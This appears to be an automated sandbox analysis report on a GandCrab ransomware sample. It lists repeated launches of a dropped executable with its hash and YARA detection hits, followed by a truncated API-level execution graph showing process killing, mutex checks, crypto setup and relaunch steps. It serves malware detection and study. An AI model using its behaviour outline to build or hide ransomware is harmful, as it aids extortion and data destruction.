                                  • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000010.00000003.403183321.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: Gandcrab, Description: Gandcrab Payload, Source: 00000010.00000003.403183321.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                  • Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 00000010.00000003.403183321.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs
                                  Reputation:low

                                  Target ID:19
                                  Start time:23:53:13
                                  Start date:31/08/2022
                                  Path:C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                                  Imagebase:0xf580000
                                  File size:71680 bytes
                                  MD5 hash:937D3395BC50812DBAB14034E2FCC25B
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000013.00000000.415482571.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  • Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 00000013.00000003.435943163.0000000003930000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                  • Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 00000013.00000003.435943163.0000000003930000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000013.00000003.435943163.0000000003930000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000013.00000003.435943163.0000000003930000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: Gandcrab, Description: Gandcrab Payload, Source: 00000013.00000003.435943163.0000000003930000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                  • Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 00000013.00000003.435943163.0000000003930000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs
                                  • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000013.00000002.437026618.000000000F592000.00000004.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000013.00000002.436990656.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  Reputation:low

                                  Target ID:22
                                  Start time:23:53:22
                                  Start date:31/08/2022
                                  Path:C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                                  Imagebase:0xf580000
                                  File size:71680 bytes
                                  MD5 hash:937D3395BC50812DBAB14034E2FCC25B
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000016.00000002.437171123.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000016.00000000.433686067.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  Reputation:low

                                  Target ID:23
                                  Start time:23:53:30
                                  Start date:31/08/2022
                                  Path:C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                                  Imagebase:0xf580000
                                  File size:71680 bytes
                                  MD5 hash:937D3395BC50812DBAB14034E2FCC25B
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 00000017.00000003.471429233.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                  • Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 00000017.00000003.471429233.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000017.00000003.471429233.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000017.00000003.471429233.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: Gandcrab, Description: Gandcrab Payload, Source: 00000017.00000003.471429233.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                  • Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 00000017.00000003.471429233.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs
                                  • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000017.00000002.473021592.000000000F592000.00000004.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000017.00000002.472905613.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000017.00000000.455550683.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  Reputation:low

                                  Target ID:25
                                  Start time:23:53:40
                                  Start date:31/08/2022
                                  Path:C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                                  Imagebase:0xf580000
                                  File size:71680 bytes
                                  MD5 hash:937D3395BC50812DBAB14034E2FCC25B
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 00000019.00000003.501007155.0000000003490000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                  • Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 00000019.00000003.501007155.0000000003490000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000019.00000003.501007155.0000000003490000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000019.00000003.501007155.0000000003490000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: Gandcrab, Description: Gandcrab Payload, Source: 00000019.00000003.501007155.0000000003490000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                  • Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 00000019.00000003.501007155.0000000003490000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000019.00000000.473313238.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000019.00000002.502607674.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000019.00000002.502628191.000000000F592000.00000004.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  Reputation:low

                                  Target ID:26
                                  Start time:23:53:49
                                  Start date:31/08/2022
                                  Path:C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                                  Imagebase:0xf580000
                                  File size:71680 bytes
                                  MD5 hash:937D3395BC50812DBAB14034E2FCC25B
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000001A.00000000.495173424.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000001A.00000002.502804269.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  Reputation:low

                                  Target ID:27
                                  Start time:23:54:01
                                  Start date:31/08/2022
                                  Path:C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                                  Imagebase:0xf580000
                                  File size:71680 bytes
                                  MD5 hash:937D3395BC50812DBAB14034E2FCC25B
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000001B.00000002.543716929.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000001B.00000000.518024199.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  • Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 0000001B.00000003.542421272.0000000003490000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                  • Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 0000001B.00000003.542421272.0000000003490000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000001B.00000003.542421272.0000000003490000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 0000001B.00000003.542421272.0000000003490000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: Gandcrab, Description: Gandcrab Payload, Source: 0000001B.00000003.542421272.0000000003490000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                  • Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 0000001B.00000003.542421272.0000000003490000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs
                                  • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 0000001B.00000002.543807830.000000000F592000.00000004.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  Reputation:low

                                  Target ID:28
                                  Start time:23:54:10
                                  Start date:31/08/2022
                                  Path:C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                                  Imagebase:0xf580000
                                  File size:71680 bytes
                                  MD5 hash:937D3395BC50812DBAB14034E2FCC25B
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000001C.00000000.542136140.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 0000001C.00000002.559901286.000000000F592000.00000004.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000001C.00000002.559852565.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  • Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 0000001C.00000003.557904847.0000000003130000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                  • Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 0000001C.00000003.557904847.0000000003130000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000001C.00000003.557904847.0000000003130000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 0000001C.00000003.557904847.0000000003130000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: Gandcrab, Description: Gandcrab Payload, Source: 0000001C.00000003.557904847.0000000003130000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                  • Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 0000001C.00000003.557904847.0000000003130000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs
                                  Reputation:low

                                  Target ID:30
                                  Start time:23:54:21
                                  Start date:31/08/2022
                                  Path:C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                                  Imagebase:0xf580000
                                  File size:71680 bytes
                                  MD5 hash:937D3395BC50812DBAB14034E2FCC25B
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 0000001E.00000002.598229388.000000000F592000.00000004.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000001E.00000002.598200905.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000001E.00000000.560904578.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  • Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 0000001E.00000003.596521661.0000000003470000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                  • Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 0000001E.00000003.596521661.0000000003470000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000001E.00000003.596521661.0000000003470000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 0000001E.00000003.596521661.0000000003470000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: Gandcrab, Description: Gandcrab Payload, Source: 0000001E.00000003.596521661.0000000003470000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                  • Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 0000001E.00000003.596521661.0000000003470000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs
                                  Reputation:low

                                  Target ID:34
                                  Start time:23:54:30
                                  Start date:31/08/2022
                                  Path:C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                                  Imagebase:0xf580000
                                  File size:71680 bytes
                                  MD5 hash:937D3395BC50812DBAB14034E2FCC25B
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000022.00000000.583307214.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000022.00000002.593533053.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  Reputation:low

                                  Target ID:35
                                  Start time:23:54:43
                                  Start date:31/08/2022
                                  Path:C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                                  Imagebase:0x7ff72dbc0000
                                  File size:71680 bytes
                                  MD5 hash:937D3395BC50812DBAB14034E2FCC25B
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000023.00000000.607979017.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000023.00000002.638125851.000000000F592000.00000004.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000023.00000002.638106882.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  • Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 00000023.00000003.636841128.0000000003970000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                  • Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 00000023.00000003.636841128.0000000003970000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000023.00000003.636841128.0000000003970000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000023.00000003.636841128.0000000003970000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: Gandcrab, Description: Gandcrab Payload, Source: 00000023.00000003.636841128.0000000003970000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                  • Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 00000023.00000003.636841128.0000000003970000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs
                                  Reputation:low

                                  Target ID:36
                                  Start time:23:54:52
                                  Start date:31/08/2022
                                  Path:C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                                  Imagebase:0xf580000
                                  File size:71680 bytes
                                  MD5 hash:937D3395BC50812DBAB14034E2FCC25B
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000024.00000002.634796069.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000024.00000000.631210947.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  Reputation:low

                                  Target ID:37
                                  Start time:23:55:02
                                  Start date:31/08/2022
                                  Path:C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                                  Imagebase:0xf580000
                                  File size:71680 bytes
                                  MD5 hash:937D3395BC50812DBAB14034E2FCC25B
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000025.00000002.681141144.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000025.00000000.650224978.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  • Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 00000025.00000003.678519196.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                  • Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 00000025.00000003.678519196.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000025.00000003.678519196.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000025.00000003.678519196.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: Gandcrab, Description: Gandcrab Payload, Source: 00000025.00000003.678519196.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                  • Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 00000025.00000003.678519196.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs
                                  • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000025.00000002.681251272.000000000F592000.00000004.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  Reputation:low

                                  Target ID:38
                                  Start time:23:55:12
                                  Start date:31/08/2022
                                  Path:C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                                  Imagebase:0xf580000
                                  File size:71680 bytes
                                  MD5 hash:937D3395BC50812DBAB14034E2FCC25B
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000026.00000002.678365276.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000026.00000000.674598119.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  Reputation:low

                                  Target ID:39
                                  Start time:23:55:23
                                  Start date:31/08/2022
                                  Path:C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                                  Imagebase:0xf580000
                                  File size:71680 bytes
                                  MD5 hash:937D3395BC50812DBAB14034E2FCC25B
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000027.00000000.693057490.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000027.00000002.720286366.000000000F592000.00000004.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000027.00000002.720225413.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  • Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 00000027.00000003.716539661.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                  • Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 00000027.00000003.716539661.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000027.00000003.716539661.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000027.00000003.716539661.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: Gandcrab, Description: Gandcrab Payload, Source: 00000027.00000003.716539661.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                  • Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 00000027.00000003.716539661.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs
                                  Reputation:low

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:22.7%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:45.5%
                                    Total number of Nodes:714
                                    Total number of Limit Nodes:15
                                    execution_graph 2439 f144da5 2442 f146620 VirtualFree VirtualFree 2439->2442 2441 f144db4 2442->2441 2443 f1443a6 2450 f1443b0 2443->2450 2444 f144456 2445 f144547 VirtualAlloc 2444->2445 2446 f144578 VirtualFree 2444->2446 2445->2446 2448 f144564 wsprintfW 2445->2448 2449 f147d70 10 API calls 2446->2449 2447 f1443e0 lstrcpyW lstrlenW 2447->2444 2447->2450 2448->2446 2451 f144598 2449->2451 2450->2444 2450->2447 1757 f144b20 Sleep 1802 f1447d0 1757->1802 1760 f144b42 CreateThread 1762 f144b60 WaitForSingleObject 1760->1762 1763 f144b8c 1760->1763 2311 f142d30 1760->2311 1761 f144b3a ExitProcess 1764 f144b76 TerminateThread 1762->1764 1765 f144b82 CloseHandle 1762->1765 1818 f1448c0 CreateToolhelp32Snapshot VirtualAlloc 1763->1818 1764->1765 1765->1763 1767 f144b91 1828 f1442b0 1767->1828 1771 f144b9e 1772 f144bec VirtualAlloc 1771->1772 1779 f144c3b 1771->1779 1773 f144c33 ExitProcess 1772->1773 1774 f144c09 GetModuleFileNameW 1772->1774 1902 f143db0 1774->1902 1775 f144c75 1780 f144ce8 1775->1780 1781 f144c9f lstrlenA VirtualAlloc CryptStringToBinaryA 1775->1781 1779->1775 1782 f144c5f Sleep 1779->1782 1851 f145860 1779->1851 1913 f144200 1780->1913 1781->1780 1783 f144ce0 ExitProcess 1781->1783 1782->1779 1786 f144d05 1916 f1441d0 1786->1916 1787 f144d12 1922 f143ff0 VirtualAlloc GetTickCount 1787->1922 1791 f144d1a DeleteCriticalSection 1930 f143c70 AllocateAndInitializeSid 1791->1930 1793 f144d2a 1794 f144d33 VirtualAlloc 1793->1794 1934 f1445b0 1793->1934 1796 f144d50 GetModuleFileNameW 1794->1796 1797 f144d7a 1794->1797 1798 f143db0 17 API calls 1796->1798 1799 f144d83 ShellExecuteW 1797->1799 1800 f144d9d ExitThread 1797->1800 1801 f144d69 VirtualFree 1798->1801 1799->1800 1801->1797 1941 f143bc0 GetProcessHeap 1802->1941 1804 f144807 1942 f147490 1804->1942 1808 f144819 VirtualAlloc 1809 f144838 lstrcpyW lstrlenW 1808->1809 2024 f1470a0 1809->2024 1812 f144869 CreateMutexW GetLastError 1813 f144881 GetLastError 1812->1813 1814 f14488a VirtualFree 1812->1814 1813->1814 2050 f147d70 1814->2050 1819 f144a58 1818->1819 1821 f144a6b 1818->1821 1820 f144a63 Process32FirstW 1819->1820 1819->1821 1820->1821 1822 f144a8f OpenProcess 1821->1822 1824 f144ac4 Process32NextW 1821->1824 1822->1821 1823 f144aa1 TerminateProcess CloseHandle 1822->1823 1823->1821 1824->1821 1825 f144ad7 1824->1825 1826 f144ae9 FindCloseChangeNotification 1825->1826 1827 f144adb VirtualFree 1825->1827 1826->1767 1827->1826 1829 f144598 1828->1829 1830 f1442cb 1828->1830 1848 f146550 VirtualAlloc VirtualAlloc 1829->1848 2121 f143bc0 GetProcessHeap 1830->2121 1832 f1442f6 1833 f147490 96 API calls 1832->1833 1834 f144302 1833->1834 1835 f1472a0 16 API calls 1834->1835 1836 f14430e VirtualAlloc 1835->1836 1837 f144332 1836->1837 1838 f1470a0 49 API calls 1837->1838 1839 f144350 1838->1839 1840 f14435c lstrlenW 1839->1840 1847 f144390 1840->1847 1841 f144456 1842 f144547 VirtualAlloc 1841->1842 1843 f144578 VirtualFree 1841->1843 1842->1843 1845 f144564 wsprintfW 1842->1845 1846 f147d70 10 API calls 1843->1846 1844 f1443e0 lstrcpyW lstrlenW 1844->1841 1844->1847 1845->1843 1846->1829 1847->1841 1847->1844 2122 f1463e0 CryptAcquireContextW 1848->2122 2130 f143bc0 GetProcessHeap 1851->2130 1853 f1458a4 1854 f147490 96 API calls 1853->1854 1855 f1458ad 1854->1855 1856 f1472a0 16 API calls 1855->1856 1857 f1458b6 VirtualAlloc 1856->1857 1858 f1458ee 1857->1858 1859 f145961 6 API calls 1858->1859 1860 f145d98 VirtualFree 1858->1860 1862 f1459e0 lstrlenA 1859->1862 1861 